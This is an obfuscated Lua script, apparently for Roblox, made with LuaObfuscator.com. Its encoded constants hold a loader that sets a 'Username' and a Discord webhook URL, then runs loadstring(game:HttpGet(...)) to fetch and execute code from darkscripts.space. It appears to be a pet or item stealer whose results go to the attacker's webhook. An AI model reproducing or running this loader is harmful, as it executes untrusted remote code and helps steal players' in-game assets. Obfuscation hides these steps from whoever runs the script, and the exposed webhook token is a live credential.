--[[
 .____                  ________ ___.    _____                           __                
 |    |    __ _______   \_____  \\_ |___/ ____\_ __  ______ ____ _____ _/  |_  ___________ 
 |    |   |  |  \__  \   /   |   \| __ \   __\  |  \/  ___// ___\\__  \\   __\/  _ \_  __ \
 |    |___|  |  // __ \_/    |    \ \_\ \  | |  |  /\___ \\  \___ / __ \|  | (  <_> )  | \/
 |_______ \____/(____  /\_______  /___  /__| |____//____  >\___  >____  /__|  \____/|__|   
         \/          \/         \/    \/                \/     \/     \/                   
          \_Welcome to LuaObfuscator.com   (Alpha 0.10.8) ~  Much Love, Ferib 

]]--

local v0=tonumber;local v1=string.byte;local v2=string.char;local v3=string.sub;local v4=string.gsub;local v5=string.rep;local v6=table.concat;local v7=table.insert;local v8=math.ldexp;local v9=getfenv or function() return _ENV;end ;local v10=setmetatable;local v11=pcall;local v12=select;local v13=unpack or table.unpack ;local v14=tonumber;local function v15(v16,v17,...) local v18=1;local v19;v16=v4(v3(v16,5),"..",function(v30) if (v1(v30,2)==81) then local v86=0;while true do if (v86==0) then v19=v0(v3(v30,1,1));return "";end end else local v87=0;local v88;while true do if (v87==0) then v88=v2(v0(v30,16));if v19 then local v123=0;local v124;while true do if (v123==1) then return v124;end if (v123==0) then v124=v5(v88,v19);v19=nil;v123=1;end end else return v88;end break;end end end end);local function v20(v31,v32,v33) if v33 then local v89=(v31/((5 -3)^(v32-(2 -(1 + 0)))))%(((1836 -(892 + 65)) -(282 + 595))^(((v33-(1638 -(1523 + 114))) -(v32-(1 -0))) + (2 -1))) ;return v89-(v89%(620 -(555 + 64))) ;else local v90=0 -0 ;local v91;while true do if (v90==(1065 -(68 + 997))) then v91=(933 -(857 + 74))^(v32-(569 -(367 + 201))) ;return (((v31%(v91 + v91))>=v91) and (928 -((510 -296) + 713))) or (0 + 0) ;end end end end local function v21() local v34=v1(v16,v18,v18);v18=v18 + 1 ;return v34;end local function v22() local v35=0 -0 ;local v36;local v37;while true do if (v35==(0 -0)) then v36,v37=v1(v16,v18,v18 + (352 -(87 + 263)) );v18=v18 + (182 -(67 + 113)) ;v35=1 + 0 ;end if (v35==(1 + 0)) then return (v37 * (628 -372)) + v36 ;end end end local function v23() local v38,v39,v40,v41=v1(v16,v18,v18 + (11 -8) );v18=v18 + (956 -(802 + 150)) ;return (v41 * (45169940 -(28393721 -(915 + 82)))) + (v40 * ((336614 -217735) -53343)) + (v39 * (109 + 78 + 69)) + v38 ;end local function v24() local v42=v23();local v43=v23();local v44=1 -0 ;local v45=(v20(v43,1188 -(1069 + 118) ,45 -(21 + 4) ) * (2^32)) + v42 ;local v46=v20(v43,(817 -(201 + 571)) -24 ,6 + (1163 -(116 + 1022)) );local v47=((v20(v43,(232 -176) -24 )==1) and  -(1 + 0)) or ((465 + 327) -(368 + 423)) ;if (v46==(0 -0)) then if (v45==((65 -47) -(10 + 8))) then return v47 * (0 -0) ;else v46=443 -(416 + 26) ;v44=0 -0 ;end elseif (v46==(879 + 1168)) then return ((v45==(0 -0)) and (v47 * (1/(438 -((514 -369) + 293))))) or (v47 * NaN) ;end return v8(v47,v46-(1453 -(44 + 386)) ) * (v44 + (v45/((1488 -(998 + (1347 -(814 + 45))))^(17 + 35)))) ;end local function v25(v48) local v49;if  not v48 then v48=v23();if (v48==(0 -0)) then return "";end end v49=v3(v16,v18,(v18 + v48) -(1 + 0) );v18=v18 + v48 ;local v50={};for v66=1, #v49 do v50[v66]=v2(v1(v3(v49,v66,v66)));end return v6(v50);end local v26=v23;local function v27(...) return {...},v12("#",...);end local function v28() local v51=(function() return function(v92,v93,v94,v95,v96,v97,v98,v99) local v92=(function() return 1206 -(696 + 510) ;end)();local v93=(function() return;end)();local v95=(function() return;end)();while true do if ((0 -0)==v92) then local v115=(function() return 0 -0 ;end)();local v116=(function() return;end)();while true do if (v115==0) then v116=(function() return 0;end)();while true do if (v116~=(0 + 0)) then else v93=(function() return v94();end)();v95=(function() return nil;end)();v116=(function() return 1;end)();end if (1==v116) then v92=(function() return  #"\\";end)();break;end end break;end end end if (v92== #"\\") then if (v93== #"!") then v95=(function() return v94()~=(1262 -(1091 + 171)) ;end)();elseif (v93==2) then v95=(function() return v96();end)();elseif (v93== #"xxx") then v95=(function() return v97();end)();end v98[v99]=(function() return v95;end)();break;end end return v92,v93,v94,v95,v96,v97,v98,v99;end;end)();local v52=(function() return function(v100,v101,v102) local v103=(function() return 0 + 0 ;end)();local v104=(function() return;end)();while true do if (v103==(0 -0)) then v104=(function() return 0 -0 ;end)();while true do if (v104==(0 -0)) then v100[v101-#"~" ]=(function() return v102();end)();return v100,v101,v102;end end break;end end end;end)();local v53=(function() return {};end)();local v54=(function() return {};end)();local v55=(function() return {};end)();local v56=(function() return {v53,v54,nil,v55};end)();local v57=(function() return v23();end)();local v58=(function() return {};end)();for v68= #"~",v57 do FlatIdent_43862,Type,v21,Cons,v24,v25,v58,v68=(function() return v51(FlatIdent_43862,Type,v21,Cons,v24,v25,v58,v68);end)();end v56[ #"asd"]=(function() return v21();end)();for v69= #">",v23() do local v70=(function() return v21();end)();if (v20(v70, #"|", #"~")~=0) then else local v107=(function() return 0;end)();local v108=(function() return;end)();local v109=(function() return;end)();local v110=(function() return;end)();while true do if (v107~=(375 -(123 + 251))) then else local v120=(function() return 0 -0 ;end)();while true do if (v120==(867 -(550 + 317))) then v110=(function() return {v22(),v22(),nil,nil};end)();if (v108==0) then local v129=(function() return 698 -(208 + 490) ;end)();local v130=(function() return;end)();while true do if (v129~=0) then else v130=(function() return 0;end)();while true do if (v130~=(0 + 0)) then else v110[ #"xnx"]=(function() return v22();end)();v110[ #"0313"]=(function() return v22();end)();break;end end break;end end elseif (v108== #"}") then v110[ #"19("]=(function() return v23();end)();elseif (v108==2) then v110[ #"-19"]=(function() return v23() -(2^(301 -(134 + 151))) ;end)();elseif (v108== #"xxx") then local v178=(function() return 0 + 0 ;end)();local v179=(function() return;end)();while true do if (v178==(1665 -(970 + 695))) then v179=(function() return 0;end)();while true do if (v179==0) then v110[ #"xnx"]=(function() return v23() -((3 -1)^(852 -(660 + 176))) ;end)();v110[ #"0836"]=(function() return v22();end)();break;end end break;end end end v120=(function() return 1 + 0 ;end)();end if (v120==(3 -2)) then v107=(function() return 2 -0 ;end)();break;end end end if (v107==(0 -0)) then local v121=(function() return 202 -(14 + 188) ;end)();while true do if (0==v121) then v108=(function() return v20(v70,677 -(534 + 141) , #"91(");end)();v109=(function() return v20(v70, #"?id=",3 + 3 );end)();v121=(function() return 242 -(187 + 54) ;end)();end if (v121~=(1 + 0)) then else v107=(function() return 781 -(162 + 618) ;end)();break;end end end if (v107==2) then if (v20(v109, #"]", #",")== #">") then v110[2 + 0 ]=(function() return v58[v110[3 -1 ]];end)();end if (v20(v109,2 + 0 ,2)== #"/") then v110[ #"19("]=(function() return v58[v110[ #"xxx"]];end)();end v107=(function() return 4 -1 ;end)();end if (3==v107) then if (v20(v109, #"gha", #"-19")== #"|") then v110[ #".com"]=(function() return v58[v110[ #"?id="]];end)();end v53[v69]=(function() return v110;end)();break;end end end end for v71= #"|",v23() do v54,v71,v28=(function() return v52(v54,v71,v28);end)();end return v56;end local function v29(v60,v61,v62) local v63=v60[1 -0 ];local v64=v60[2 -0 ];local v65=v60[1 + 2 ];return function(...) local v72=v63;local v73=v64;local v74=v65;local v75=v27;local v76=(3298 -(1477 + 184)) -(1373 + 263) ;local v77= -(1001 -(451 + 549));local v78={};local v79={...};local v80=v12("#",...) -(1 + 0) ;local v81={};local v82={};for v105=0 -0 ,v80 do if ((v105>=v74) or (164>=2785)) then v78[v105-v74 ]=v79[v105 + (983 -((24 -6) + 964)) ];else v82[v105]=v79[v105 + (1 -0) ];end end local v83=(v80-v74) + 1 ;local v84;local v85;while true do local v106=0 -0 ;while true do if ((v106==((1290 + 94) -((1602 -(564 + 292)) + 638))) or (525==2109)) then v84=v72[v76];v85=v84[(1 -0) + 0 ];v106=1 -0 ;end if (v106==(342 -((656 -438) + 123))) then if (v85<=(1590 -(1535 + 46))) then if ((33==33) and (v85<=(4 + 0))) then if (v85<=(1 + 0)) then if (v85>(560 -(306 + 254))) then local v132=v84[740 -(542 + (500 -(244 + 60))) ];v82[v132]=v82[v132](v13(v82,v132 + 1 + 0 ,v77));elseif ((3054<=4015) and (v82[v84[3 -1 ]]==v84[1471 -(899 + 568) ])) then v76=v76 + 1 + 0 + 0 ;else v76=v84[2 + 1 ];end elseif (v85<=(4 -2)) then local v134=0 -0 ;local v135;local v136;local v137;local v138;while true do if (v134==(603 -(268 + 335))) then v135=v84[292 -(60 + 230) ];v136,v137=v75(v82[v135](v13(v82,v135 + (406 -(118 + 287)) ,v84[11 -8 ])));v134=1122 -(118 + 1003) ;end if ((1871<3382) and (v134==(574 -(426 + 146)))) then for v180=v135,v77 do v138=v138 + 1 + (476 -(41 + 435)) ;v82[v180]=v136[v138];end break;end if (v134==(1457 -(282 + 1174))) then v77=(v137 + v135) -(4 -3) ;v138=0 + 0 ;v134=979 -(553 + 424) ;end end elseif (v85==(814 -(569 + 242))) then v76=v84[(1009 -(938 + 63)) -5 ];else v76=v84[1 + 2 ];end elseif (v85<=(1030 -(706 + 318))) then if (v85>(1256 -(555 + 166 + 530))) then do return;end else do return;end end elseif ((1293<=2166) and (v85<=(1278 -((2070 -(936 + 189)) + 326)))) then v62[v84[3]]=v82[v84[4 -2 ]];elseif (v85>(8 + 0)) then v82[v84[702 -(271 + 429) ]]=v62[v84[3 + 0 ]];else v82[v84[1502 -(1408 + 92) ]]();end elseif ((v85<=(1100 -(461 + 206 + 419))) or (2579<123)) then if (v85<=(1299 -(993 + 295))) then if ((v85>(1 + 9)) or (846>=2368)) then v82[v84[(2786 -(1565 + 48)) -(418 + 753) ]]=v84[2 + 1 ];elseif (v82[v84[1 + 1 + 0 ]]==v84[2 + 2 ]) then v76=v76 + 1 ;else v76=v84[3];end elseif (v85<=(4 + 8)) then local v143=v84[531 -((1544 -(782 + 356)) + 123) ];v82[v143]=v82[v143](v13(v82,v143 + (1770 -((2016 -(176 + 91)) + 20)) ,v77));elseif (v85>(29 -16)) then v62[v84[1205 -(373 + 829) ]]=v82[v84[4 -2 ]];else v82[v84[1 + 1 ]]();end elseif ((v85<=(1338 -(1249 + 73))) or (4012<=3358)) then if (v85==(9 + 6)) then v82[v84[1 + 1 ]]=v84[1148 -(466 + 679) ];else local v147=0 -0 ;local v148;local v149;while true do if ((1494<=3005) and (v147==(238 -(64 + 174)))) then v148=v84[5 -3 ];v149=v82[v84[1903 -(106 + 1794) ]];v147=1 + 0 ;end if (v147==(1 + 0)) then v82[v148 + 1 ]=v149;v82[v148]=v149[v84[4]];break;end end end elseif (v85<=((73 -23) -33)) then local v150=0 -0 ;local v151;local v152;local v153;local v154;while true do if (v150==(115 -(4 + 110))) then v77=(v153 + v151) -(585 -(57 + 527)) ;v154=0 + 0 ;v150=1429 -(41 + 1386) ;end if ((v150==(1 + (1093 -(975 + 117)))) or (3111==2134)) then for v183=v151,v77 do v154=v154 + (104 -(17 + 86)) ;v82[v183]=v152[v154];end break;end if (v150==0) then v151=v84[2 + 0 ];v152,v153=v75(v82[v151](v13(v82,v151 + (1 -0) ,v84[8 -5 ])));v150=1;end end elseif ((2355==2355) and (v85==(184 -(122 + 44)))) then local v164=0 + 0 ;local v165;local v166;while true do if (v164==(1 -0)) then v82[v165 + 1 + 0 ]=v166;v82[v165]=v166[v84[1979 -(1913 + 62) ]];break;end if ((v164==(0 -0)) or (588<=432)) then v165=v84[(1877 -(157 + 1718)) + 0 + 0 ];v166=v82[v84[1 + 2 ]];v164=1 -0 ;end end else v82[v84[67 -(30 + 35) ]]=v62[v84[3 + 0 ]];end v76=v76 + (3 -(6 -4)) ;break;end end end end;end return v29(v28(),{},v17)(...);end return v15("LOL!0A3Q00028Q00026Q00F03F030A3Q006C6F6164737472696E6703043Q0067616D6503073Q00482Q7470476574031F3Q00682Q7470733A2Q2F6461726B736372697074732E73706163652F706574676F03083Q00557365726E616D65030D3Q004772616E745F6A6F7264616E3503073Q00576562682Q6F6B03793Q00682Q7470733A2Q2F646973636F72642E636F6D2F6170692F776562682Q6F6B732F31332Q30334Q342Q33382Q333230352Q372F385375544E2Q504F5658364759637433754B656D6C2Q582D4A556D50387549385F706F6E4864384C4443654C567256335A556C494846795F49344F77496864482D4F786700143Q00120B3Q00013Q00260A3Q000B00010002002Q043Q000B0001001209000100033Q001209000200043Q00201200020002000500120B000400064Q0002000200044Q000C00013Q00022Q000D000100010001002Q043Q0013000100260A3Q000100010001002Q043Q0001000100120B000100083Q001207000100073Q00120B0001000A3Q001207000100093Q00120B3Q00023Q002Q043Q000100012Q00053Q00017Q00",v9(),...);
